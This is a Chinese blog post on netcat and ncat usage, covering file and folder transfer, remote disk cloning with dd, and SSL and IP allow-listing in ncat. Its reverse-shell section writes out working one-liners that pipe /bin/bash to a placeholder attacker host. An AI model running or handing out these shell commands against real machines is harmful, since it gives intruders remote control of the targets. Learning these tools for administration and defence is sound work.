首页 > 其他分享 >nc和ncat的特殊使用

nc和ncat的特殊使用

时间:2023-05-20 16:11:12浏览次数:27  
标签:shell target ip nc 特殊 4444 port ncat

在平常使用nc只会反弹shell,和文件传输,这里学到一些其他的使用方法记录一下

反弹shell

# 反弹shell
nc -lvp 4444 -e /bin/bash 
nc -nv target_ip target_port 

# 常用的反弹shell
nc -lvp 4444
nc -nv attack_ip attack_port -e /bin/bash

注意:在最新的netcat中,不自在-e或者是-c参数,建议安装Nmap的模块Ncat,提供了丰富nc的特殊功能。

文件传输

# 接收方
nc -lvp 4444 > test.txt
# 将4444端口监听到的信息保存到 test.txt 文件中

# 传输方
nc -nv target_ip target_port < a.txt
# 将 a.txt 传输到目标服务器

# 另一种方法
# 传输方
nc -lvp 4444 < a.txt
# 将 a.txt 内容传输给连接到的 4444 端口

# 接收方
nc -nv target_ip target_port > test.txt
# 连接到目标的短裤,将数据保存到 test.xt

配合tar命令传输文件夹

# 接收方
nc -lvp 4444 | tar -xvf -
# 传输方
tar -cvf - 目录名 | nc -nv target_ip target_port 


# 另一种方法
# 传输方
tar -cvf - 目录名 | nc -lvp 4444
# 接收方
nc -nv target_ip target_port | tar -xvf -

配合dd命令远克隆磁盘

# 克隆磁盘的一段
nc -lvp 4444 | dd of=/dev/sda_copy

# 远程服务器
dd if=/dev/sda | nc -nv target_ip target_port -q 1

# 将 /dev/sda 传输到需要克隆机器中的 /dev/sda_copy 设备中

其中-q 1参数代表,传输完成自动退出,在传输文件、文件夹中也可以加入该参数。这里也有另一种反过来的方法复制,这里不再演示

Ncat的使用

Ncatnc的一个升级版,Ncat可以使用任何nc可以执行的操作(例如我们上述执行的操作),Ncat也有其特殊的功能。
nc在进行传输数据的时候是明文传输,Ncat可以使用SSL加密解决这个问题;并且进行反弹shell的操作时,监听的shell任何人都可以连接,ncat也可以解决这个问题

常用的参数:

  • --ssl:采用ssl加密连接
  • --allow: 指定可以连接的IP地址

使用实例:

# 共享shell的一方
ncat -lp 4444 --ssl -e /bin/bash --allow 192.168.100.123
# 共享shell到4444端口,启用ssl加密传输,并且只有 192.168.100.123 这个IP地址可以连接


# 连接shell的一方
ncat -nv target_ip target_port --ssl

标签:shell,target,ip,nc,特殊,4444,port,ncat
From: https://www.cnblogs.com/Junglezt/p/17417094.html

相关文章

  • instanceof和类型转换
    instanceof和类型转换instanceofpackageoop.demo01.demo06;publicclassPerson{}packageoop.demo01.demo06;publicclassTeacher{}packageoop.demo01.demo06;publicclassStudentextendsPerson{}packageoop.demo01.demo06;publicclassApplicat......
  • 碧圈异步交易平台AsyncAlgoTrading学习笔记一:下载与编译
    下载无exe或Linux二进制,需源码编译安装GitHub地址:https://github.com/AsyncAlgoTrading/aat.git编译运行环境ubuntu20.04python3.8.10编译1.将Makefile中的PYTHON=python改为PYTHON=python32.安装必要的依赖:(1)sudoapt-getinstallpython3-dev(2)sudoapt-getinstallbui......
  • Oracle migrate the users into another DB instance
    -----------------------------------------------###############OnSource###################---------------------------------------------createorreplaceprocedurepr_user_ddlascursorget_usernameisselectusernamefromdba_userswhereusernamelik......
  • 关于购买AWS-EC2-RI-Reserved Instances的一些说明以及折扣后Reserved Instance ID的
    关于在AWS上,如果一台EC2机器需要长时间使用、都是建议购买ReservedInstances,即一种预付费的方式,建议是选择AllUpfront,预付全部的费用,则可以享受到最大的折扣,在购买时需要主意如下几个选项只有当上面的选项与EC2的对应的属性相匹配时,才能免除其运行时产生的费用 另外每......
  • May 2022-Neighborhood Mixup Experience Replay: Local Convex Interpolation for Im
    摘要:经验回放在提高深度强化学习智能体的样本效率方面起着至关重要的作用。经验回放的最新进展建议使用Mixup-2018,通过合成样本生成进一步提高样本效率。在这种技术的基础上,提出了邻域混合经验回放(NMER),一种基于几何的回放缓冲区,用状态-动作空间中最近邻的转换进行插值。NMER仅......
  • @EnableAsync @Async
    一.基本介绍@Async是spring为了方便开发人员进行异步调用的出现的,在方法上加入这个注解,spring会从线程池中获取一个新的线程来执行方法,实现异步调用@EnableAsync表示开启对异步任务的支持,可以放在springboot的启动类上,也可以放在自定义线程池的配置类上,具体看下文二.最简单的......
  • subsequence1 (牛客多校) (2个串比大小, DP, 组合数)
    题面大意:给定2个字符串,问有多少个子字符串S,是大于t的 思路数据范围很小,因此考虑n^2做法分2步,位数s>位数t的时候然后位数相等的时候利用DP,处理,分别就是枚举前k个数和s相同,然后k+1个数比t大就可以. 具体思路自己想想,和那个比较像   cons......
  • iEnhancer-ENCC_test_layer1.py源码阅读
    一、基本准备¶1、导入包:与train一致¶ In [ ]:importnumpyasnpimporttorchfromtorchimportnnfromtorch.autogradimportVariablefromtorch.utils.dataimportDataset,DataLoaderimporttorch.nn.functionalasFimportpickleimport......
  • 百度飞桨(PaddlePaddle) - PP-OCRv3 文字检测识别系统 Paddle Inference 模型推理
    PaddleInference模型推理流程分别介绍文字检测、方向分类器和文字识别3个模型,基于PaddleInference的推理过程。PaddleInference的Python离线推理离线推理,即在特定机器上部署的代码只能在这台机器上使用,无法通过其他机器进行访问使用whl包预测推理“WHL”是“WHeeL”的英文......
  • flutter系列之:使用AnimationController来控制动画效果
    目录简介构建一个要动画的widget让图像动起来总结简介之前我们提到了flutter提供了比较简单好用的AnimatedContainer和SlideTransition来进行一些简单的动画效果,但是要完全实现自定义的复杂的动画效果,还是要使用AnimationController。今天我们来尝试使用AnimationController来实现......